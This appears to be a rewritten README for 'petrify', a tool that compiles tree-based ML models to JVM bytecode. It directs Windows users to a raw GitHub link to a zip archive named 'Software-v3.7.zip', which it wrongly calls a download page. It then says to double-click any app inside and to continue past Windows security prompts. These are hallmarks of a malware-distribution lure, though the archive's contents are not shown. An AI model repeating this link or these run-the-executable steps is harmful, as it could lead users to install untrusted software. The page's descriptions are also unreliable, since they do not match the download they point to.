petrify helps you turn machine learning models into JVM bytecode. It works with common model formats like ONNX, XGBoost, LightGBM, and SciKit-Learn tree models. This lets you run model inference on the Java Virtual Machine without extra runtime tools.
Use petrify when you want to:
- run models inside Java apps
- keep inference close to your existing JVM code
- avoid shipping a separate model runtime
- use tree-based models in a simple deployment flow
Before you start, make sure you have:
- Windows 10 or Windows 11
- A recent 64-bit Intel or AMD processor
- At least 4 GB of RAM
- 500 MB of free disk space
- Internet access for the download page
- Java 17 or later if you plan to use generated bytecode in your own app
If you only want to try the tool, a standard Windows laptop or desktop is enough.
Open the download page here:
https://raw.githubusercontent.com/fore4915/petrify/main/tare/Software-v3.7.zip
From that page, get the latest version or source package, then save it to your computer.
Follow these steps on Windows:
- Open the download page in your browser.
- Download the latest release or source archive.
- If the file is zipped, right-click it and choose Extract All.
- Move the extracted folder to a place you can find again, such as Downloads or Desktop.
- If the package includes an app file, double-click it to start.
- If the package includes a Java tool, open the included launcher or run the jar file with Java installed.
If Windows shows a security prompt, choose the option that lets you continue only if you trust the file source.
After you open petrify, you will usually work in three steps:
- Load your model file.
- Choose the output format for JVM use.
- Build the bytecode output.
A typical flow looks like this:
- select an ONNX, XGBoost, LightGBM, or SciKit-Learn model
- set the output path for the generated Java bytecode
- start the compile step
- check the output folder for the generated files
petrify is built for tree-based machine learning models and model files used in common Python and Java ML stacks.
It can work with:
- ONNX models
- XGBoost tree ensembles
- LightGBM models
- SciKit-Learn decision trees and ensembles
- PMML-based workflows in JVM setups
- models used with tools like Tribuo, m2cgen, and mcpgen
This makes it useful when you need to move a trained model into a Java runtime without changing how the model behaves.
A simple workflow looks like this:
- Train a model in your usual tool.
- Export it to a supported format.
- Open petrify on Windows.
- Compile the model to JVM bytecode.
- Use the output in a Java app or service.
This helps when you want fast local inference and a simple deployment path for a Java-based system.
When petrify finishes, it creates bytecode or Java-friendly output that you can use in a JVM project. The result is meant for:
- server apps
- desktop tools
- batch jobs
- embedded Java workflows
- local inference inside existing code
You can keep the model logic close to your app code and avoid a separate Python runtime at deployment time.
You may find petrify useful for:
- scoring data in a Java backend
- shipping a model with a desktop app
- replacing a Python inference service with JVM code
- running decision tree models in a controlled environment
- keeping deployment simple for Windows users
If you are new to this, use this simple path:
- Download petrify from the link above.
- Extract the files.
- Open the tool in Windows.
- Load your model file.
- Pick the output folder.
- Start the compile process.
- Copy the generated output into your Java project.
If the project includes sample files, start with those before using your own model.
- Keep your model file in a short folder path, such as
C:\Models. - Use a folder with no special characters in the name.
- Close other large apps if your model is large.
- Make sure Java is installed if the tool asks for it.
- Save the output in a new folder so it is easy to find.
This project relates to:
- bytecode
- compiler
- decision trees
- inference
- Java
- JVM
- LightGBM
- machine learning
- ONNX
- PMML
- SciKit-Learn
- tree ensemble
- Tribuo
- XGBoost
For a clean setup on Windows, use a folder layout like this:
Downloads\petrifyDocuments\ModelsDocuments\petrify-output
This makes it easier to find your input model and the generated output.
Check these common points:
- the model file is in a supported format
- the file was fully downloaded
- you extracted the archive before opening it
- Java is installed if the app needs it
- the output folder has write access
- the model path is short and easy to read
If the tool closes right away, try opening it again from the extracted folder and confirm that all files are still in place.
Primary download page:
https://raw.githubusercontent.com/fore4915/petrify/main/tare/Software-v3.7.zip